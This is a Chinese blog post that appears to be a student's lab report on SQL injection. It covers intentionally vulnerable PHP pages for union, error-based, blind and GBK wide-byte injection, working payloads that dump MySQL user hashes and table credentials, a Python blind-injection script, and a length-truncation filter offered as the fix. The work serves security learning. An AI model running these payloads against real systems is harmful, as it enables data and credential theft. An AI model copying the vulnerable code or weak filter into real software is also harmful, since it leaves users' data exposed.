follow my dream

sqli代码编写与防护

字数统计: 5.3k阅读时长: 30 min
2020/05/05 Share

要求 0x01

1、编写常规回显注入的代码,在之前的搭建的环境中测试是否正常

2、编写报错注入的代码,并做相应的服务器配置来满足条件,并测试代码是否正常

3、编写盲注的代码,在之前的搭建的环境中测试是否正常

4、编写宽子节注入的代码,并做相应的服务器配置来满足条件,并测试代码是否正常

注意事项:环境可以是虚拟机的快照、也可以是 docker 环境,具体用什么可以自选,重点是学习造成这几类注入的原因;注入漏洞通常会出现在多个场景,比如:注册、登录、查询、搜索、留言等,所以写那些脚本的时候可以自选场景,不限于举例的场景;有些注入环境与服务器配置相关,需要大家配置相应的漏洞环境来结合自己编写的脚本完成漏洞环境的搭建。

环境

用的是树莓派上的docker

参考sqli-labs

docker :joaquindlz/rpi-docker-lamp

  • mysql

信息:

账号密码 信息
root demo

版本 : 5.5.40-1+rpi1

  • apache2

版本: Apache/2.4.10 (Raspbian)

  • php

版本: PHP 5.6.6-2 (cli)

目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
|-- connect
| |-- connect.php
| `-- db-config.php
|-- demo1
| `-- index.php
|-- demo2
| `-- index.php
|-- demo3
| `-- index.php
|-- demo4
| `-- index.php
|-- index.html
`-- setup-db.ph
  • index.html

1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>index</title>
</head>
<body bgcolor="#AAAAAA">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">welcome to challenge <br>
</div>
<a href="setup-db.php"><font color="#E4287C">请先重置数据库</font></a></br></br>
<a href="./demo1/index.php"><font color="#AACCAA">常规回显注入</font></a></br></br>
<a href="./demo2/index.php"><font color="#AA0000">报错注入</font></a></br></br>
<a href="./demo3/index.php"><font color="#0000FF">盲注</font></a></br></br>
<a href="./demo4/index.php"><font color="#FFFFFF">宽子节注入</font></a></br></br>
</body>
</html>
  • set-up.php

2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>SETUP DB</title>
</head>

<body bgcolor="#AAAAAA">

<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center">
Welcome
<font color="#0000FF"> to challenge</font>
<br>
</div>

<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:left">
<font size="3" color="#000000">
重置数据库:
<br><br>
<!--来自sqli-labs-->

<?php
include("./connect/db-config.php");

//测试连接
$conn = mysql_connect($host,$dbuser,$dbpass);
if(!$conn)
{
die('[*] 无法连接: ' .mysql_error());
}



//清空旧的数据库
$sql="DROP DATABASE IF EXISTS security";
if(mysql_query($sql))
{
echo "[*] 成功删除旧数据库;"."<br>" ;
}
else
{
echo "无法正常删除旧数据库;"."<br>";
}

//创建新的数据库
$sql="CREATE database `security` CHARACTER SET `gbk` ";
if (mysql_query($sql))
{
echo "[*] security数据库创建成功;"."<br>";
}
else
{
echo "[*] 错误 : ".mysql_error()."<br>";
}

//创建user表
$sql="CREATE TABLE security.users (id int(3) NOT NULL AUTO_INCREMENT PRIMARY KEY, username varchar(20) NOT NULL, password varchar(20) NOT NULL);";
if (mysql_query($sql))
{
echo "[*] user表格创建成功"."<br>";
}
else
{
echo "[*] 错误 : ".mysql_error()."<br>";
}
//插入数据
$sql="INSERT INTO security.users (id, username, password) VALUES ('1', 'xzas', 'xzas'), ('2', 'fe1w0', 'flag2333'), ('3', 'demo', 'nothing'), ('4', 'admin', 'iamnotanadmin'), ('5', 'stupid', 'stupidity');";
if (mysql_query($sql))
{
echo "[*] 插入数据到user表成功"."<br>";
}
else
{
echo "[*] 插入数据失败 : " . mysql_error()."<br>";
}
?>
  • connect

    connect.php

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    <?php

    include("db-config.php");

    $con = mysql_connect($host,$dbuser,$dbpass,$dbname);

    if(mysqli_connect_errno($con))
    {
    echo('[*] 连接失败: '.mysqli_connect_errno());
    }
    else
    {
    @mysql_select_db($dbname,$con) or die("[*] Error::无法选择数据库 $dbname");
    }

    ?>

db-config.php

1
2
3
4
5
6
7
8
<?php 
// 配置文件
$dbuser ='root';
$dbpass ='demo';
$dbname ="security";
$host = 'localhost';
?>

1. 常规回显注入

3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>1. 常规回显注入</title>
</head>
<body bgcolor="#AAAAAA">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">1. <font color="#AACCAA"> 常规回显注入 </font><br>
<font size="3" color="#FFFFFF">


<?php
include("../connect/connect.php");

error_reporting(0);
mysqli_select_db($con,$dbname);

$id = 1;
if(isset($_GET['id']))
{
$id = $_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1 ;";
echo $sql."<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FF0000">';
//print_r(mysql_error());
echo "</font>";
}
}
else
{
echo ('<font color="#000000"> please input the id as parameter.</font>') ;
}
?>
</font>
</div>
</body>
</html>

2.报错注入

4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>2. 报错注入</title>
</head>
<body bgcolor="#AAAAAA">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">2. <font color="#AA0000"> 报错注入 </font><br>
<font size="3" color="#FFFFFF">


<?php
include("../connect/connect.php");

error_reporting(0);
mysqli_select_db($con,$dbname);

$id = 1;
if(isset($_GET['id']))
{
$id = $_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1 ;";
//echo $sql."<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FF0000">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo ('<font color="#000000"> please input the id as parameter.</font>') ;
}
?>
</font>
</div>
</body>
</html>

3. 盲注

33

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>3. 盲注</title>
</head>
<body bgcolor="#AAAAAA">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">3. <font color="#0000FF"> 盲注 </font><br>
<font size="3" color="#FFFFFF">


<?php
include("../connect/connect.php");

error_reporting(0);
mysqli_select_db($con,$dbname);

$id = 1;
if(isset($_GET['id']))
{
$id = $_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1 ;";
//echo $sql."<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "Welcome to challenge;";
}
else
{
echo '<font color= "#FF0000">';
//print_r(mysql_error());
echo "</font>";
}
}
else
{
echo ('<font color="#000000"> please input the id as parameter.</font>') ;
}
?>
</font>
</div>
</body>
</html>

4.宽子节注入

6

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>4.宽子节注入</title>
</head>
<body bgcolor="#AAAAAA">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">4. <font color="#FFFFFF"> 宽子节注入 </font><br>
<font size="3" color="#FFFFFF">



<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0AA; text-align:center; width:400px; height:150px;">

<div style="padding-top:10px; font-size:15px;">


<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;
<input type="text" name="uname" value=""/>
</div>
<div> Password : &nbsp;&nbsp;&nbsp;
<input type="text" name="passwd" value=""/>
</div></br>
<div style=" margin-top:9px;margin-left:90px;">
<input type="submit" name="submit" value="Submit" />
</div>
</form>

</div>
</div>

</font>

<?php
include("../connect/connect.php");

error_reporting(0);
mysqli_select_db($con,$dbname);


if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];

$uname = mysql_real_escape_string($uname1);
$passwd= mysql_real_escape_string($passwd1);


mysql_query("SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
//echo $sql."<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo "</font>";
}
else
{
echo '<font color= "#FF0000">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo ('<font color="#000000" > please post the your uname and passwd.</font>') ;
}
?>
</div>
</body>
</html>

要求 0x02

1、手工测试之前搭建的不同注入环境,并记录 sql 语句,最终以获取 mysql 中的用户信息和当前表的信息为目标

2、思考通过注入漏洞可以做什么?

3、思考注入漏洞如何防御?代码、服务器等角度

扩展学习:针对不同的注入漏洞,编写防御代码,具体如何防御自己决定,相关代码均记录在报告中,测试自己的防御代码是否可以绕过,并将过程进行记录


趁热打铁

注入测试

0x01 常规回显注入

mysql 中的用户信息

联合查找

  • 查mysql数据库中的表
1
http://192.168.3.3:9999/demo/demo1/index.php?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='mysql'  limit 1,2  --+

response

columns_priv,db,event,func,general_log,help_category,help_keyword,help_relation,help_topic,host,ndb_binlog_index,plugin,proc,procs_priv,proxies_priv,servers,slow_log,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zone_transition,time_zone_transition_type,user

  • 查mysql数据库的user表
1
http://192.168.3.3:9999/demo/demo1/index.php?id=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='mysql'  and table_name= 'user' limit 1,2  --+

response

Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routin

  • 获取密码
1
http://192.168.3.3:9999/demo/demo1/index.php?id=1' union select 1, group_concat(user,password)  ,1 from mysql.user limit 1,2  --+

response

rootC142FB215B6E05B7C134B1A653AD4B455157FD79,root,root,root,admin003DF4A877C26FE99DBABE143C8BB6295BCE6316

当前表的信息

  • 库名
1
http://localhost/demo/work/demo/demo1/index.php?id=1' union select 1,database(),3 from information_schema.columns where table_schema=database() and table_name= 'users' limit 1,2  --+

security

  • 查表
1
http://localhost/demo/work/demo/demo1/index.php?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()  limit 1,2  --+

users

  • 查列
1
http://localhost/demo/work/demo/demo1/index.php?id=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name= 'users' limit 1,2  --+

id,username,password

  • 查信息
1
http://localhost/demo/work/demo/demo1/index.php?id=1' union select 1,group_concat(username,"|",password),3 from security.users limit 1,2  --+

username:xzas|password:xzas,username:fe1w0|password:flag2333,username:demo|password:nothing,username:admin|password:iamnotanadmin,username:stupid|password:stupidity

0x02 报错注入

以mysql为例,查询security一样

  • 库名
1
http://localhost/demo/work/demo/demo2/index.php?id=1'  and extractvalue(0x0a,concat(0x0a,(select database())))--+

XPATH syntax error: ‘ security’

1
http://localhost/demo/work/demo/demo2/index.php?id=1'  and extractvalue(0x0a,concat(0x0a,(select group_concat(table_name) from information_schema.tables where table_schema='mysql' )))--+

需要注意的是,报错注入的反显长度

XPATH syntax error: ‘ columns_priv,component,db,defau’

解决方法:

利用mid 来更改长度就可

1
http://localhost/demo/work/demo/demo2/index.php?id=1'  and extractvalue(0x0a,concat(0x0a,(select mid(group_concat(table_name),32,32) from information_schema.tables where table_schema='mysql' )))--+

XPATH syntax error: ‘ lt_roles,engine_cost,func,gener’

  • 查列
1
http://localhost/demo/work/demo/demo2/index.php?id=1'  and extractvalue(0x0a,concat(0x0a,(select mid(group_concat(column_name),1,32)from information_schema.columns where table_schema='mysql'  and table_name= 'user'  )))--+

XPATH syntax error: ‘ Host,User,Select_priv,Insert_pr’

  • 查数据
1
2
http://localhost/demo/work/demo/demo2/index.php?id=1'  and  updatexml(1,concat(0x7e,(select group_concat(host) from mysql.user ),0x7e),1)
--+

XPATH syntax error: ‘~localhost,localhost,localhost,l’

0x03 盲注

布尔盲注为例

以查询database()为例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import requests

result = ""
url_template = "http://192.168.3.3:9999/demo/demo3/index.php? id=0' || ascii(substr(({0}),{1},1))={2} %23"
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~"
url_length = "http://192.168.3.3:9999/demo/demo3/index.php?id=0' || length(({0})) ={1} %23"
Value ="Welcome "

def get_result_length(payload,Value):
for n in range(1,100):
url = url_length.format(payload,n)
#print(url)
response = requests.get(url)
if Value in response.text:
print("[*] length:" + str(n))
return n


def get_db_name(data_length,payload,Value):
for i in range(1,data_length):
for char in chars:
url = url_template.format(payload,i,ord(char))
response = requests.get(url)
if Value in response.text:
global result
result += char
#print("…… data is :"+ result)
break

payload = "database() "


data_length = get_result_length(payload,Value)+1
get_db_name(data_length,payload,Value )
print("[*] data:"+ result)

[*] length:8
[*] data:security
[Finished in 7.4s]

0x04 宽子节注入

payload

post

1
passwd=123&submit=Submit&uname=%EF%BF%BD%27+or+1%3D1%23

再配合布尔注入、报错注入或延时注入

例如

1
passwd=123&submit=Submit&uname=%EF%BF%BD%27+or+extractvalue(0x0a,concat(0x0a,(select database())))--+

XPATH syntax error: ‘ security’

防御修复

0x01

修复点:

  • 对get点进行过滤
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>1. 常规回显注入</title>
</head>
<body bgcolor="#AAAAAA">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">1. <font color="#AACCAA"> 常规回显注入 </font><br>
<font size="3" color="#FFFFFF">


<?php
include("../connect/connect.php");

error_reporting(0);
mysqli_select_db($con,$dbname);


function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,10);
}
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}

// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}

else
{
$value = intval($value);
}
return $value;
}



$id = 1;
if(isset($_GET['id']))
{

$id = check_input($_GET['id']);
$sql="SELECT * FROM users WHERE id= $id LIMIT 0,1 ;";
echo $sql."<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FF0000">';
//print_r(mysql_error());
echo "</font>";
}
}
else
{
echo ('<font color="#000000"> please input the id as parameter.</font>') ;
}
?>
</font>
</div>
</body>
</html>

对特殊字符串进行转义

http://localhost/demo/work/demo/demo1/?id=100%df' union select 1 ,user(),3 limit 1,2 #失败

感觉一方面长度过长,一方面无法因不是gbk用宽字节注入

可以尝试预处理,来绕过长度过滤。

0x02

报错注入的问题是显示报错信息,关闭就行

但配合布尔或延时还是可以继续注入

可以继续用上面的check_input来过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>2. 报错注入</title>
</head>
<body bgcolor="#AAAAAA">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">2. <font color="#AA0000"> 报错注入 </font><br>
<font size="3" color="#FFFFFF">


<?php
include("../connect/connect.php");


function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,10);
}
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}

// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}

else
{
$value = intval($value);
}
return $value;
}


error_reporting(0);
mysqli_select_db($con,$dbname);

$id = 1;
if(isset($_GET['id']))
{
$id = check_input($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1 ;";
//echo $sql."<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FF0000">';
//print_r(mysql_error());
echo "</font>";
}
}
else
{
echo ('<font color="#000000"> please input the id as parameter.</font>') ;
}
?>
</font>
</div>
</body>
</html>

0x03

同样可以对查询的长度进行限制。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>3. 盲注</title>
</head>
<body bgcolor="#AAAAAA">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">3. <font color="#0000FF"> 盲注 </font><br>
<font size="3" color="#FFFFFF">


<?php
include("../connect/connect.php");

error_reporting(0);
mysqli_select_db($con,$dbname);




function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,10);
}
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}

// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}

else
{
$value = intval($value);
}
return $value;
}


$id = 1;
if(isset($_GET['id']))
{
$id = check_input($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1 ;";
//echo $sql."<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "Welcome to challenge;";
}
else
{
echo '<font color= "#FF0000">';
//print_r(mysql_error());
echo "</font>";
}
}
else
{
echo ('<font color="#000000"> please input the id as parameter.</font>') ;
}
?>
</font>
</div>
</body>
</html>

0x04

宽字节注入的话

添加check_input函数并取消gbk格式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>4.宽子节注入</title>
</head>
<body bgcolor="#AAAAAA">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">4. <font color="#FFFFFF"> 宽子节注入 </font><br>
<font size="3" color="#FFFFFF">



<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0AA; text-align:center; width:400px; height:150px;">

<div style="padding-top:10px; font-size:15px;">


<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;
<input type="text" name="uname" value=""/>
</div>
<div> Password : &nbsp;&nbsp;&nbsp;
<input type="text" name="passwd" value=""/>
</div></br>
<div style=" margin-top:9px;margin-left:90px;">
<input type="submit" name="submit" value="Submit" />
</div>
</form>

</div>
</div>

</font>

<?php
include("../connect/connect.php");

error_reporting(0);
mysqli_select_db($con,$dbname);





function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,10);
}
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}

// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}

else
{
$value = intval($value);
}
return $value;
}


if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];

$uname = check_input($uname1);
$passwd= check_input($passwd1);


//mysql_query("SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
//echo $sql."<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo "</font>";
}
else
{
echo '<font color= "#FF0000">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo ('<font color="#000000" > please post the your uname and passwd.</font>') ;
}
?>
</div>
</body>
</html>

后记

emmm 信安之路上的报告,应该是打算推一周,想把最近好的比赛上的知识点好好吸收

特别是ssrf、xss 、代码审计这两块,被前辈问倒好多问题。害,加油学。

考试推迟到24号后,嗯 nice ~。。。学习不能丢

CATALOG
  1. 1. 要求 0x01
    1. 1.1. 环境
    2. 1.2. 1. 常规回显注入
    3. 1.3. 2.报错注入
    4. 1.4. 3. 盲注
    5. 1.5. 4.宽子节注入
  2. 2. 要求 0x02
    1. 2.1. 注入测试
      1. 2.1.1. 0x01 常规回显注入
        1. 2.1.1.1. mysql 中的用户信息
        2. 2.1.1.2. 当前表的信息
      2. 2.1.2. 0x02 报错注入
      3. 2.1.3. 0x03 盲注
      4. 2.1.4. 0x04 宽子节注入
    2. 2.2. 防御修复
      1. 2.2.1. 0x01
      2. 2.2.2. 0x02
      3. 2.2.3. 0x03
      4. 2.2.4. 0x04
  3. 3. 后记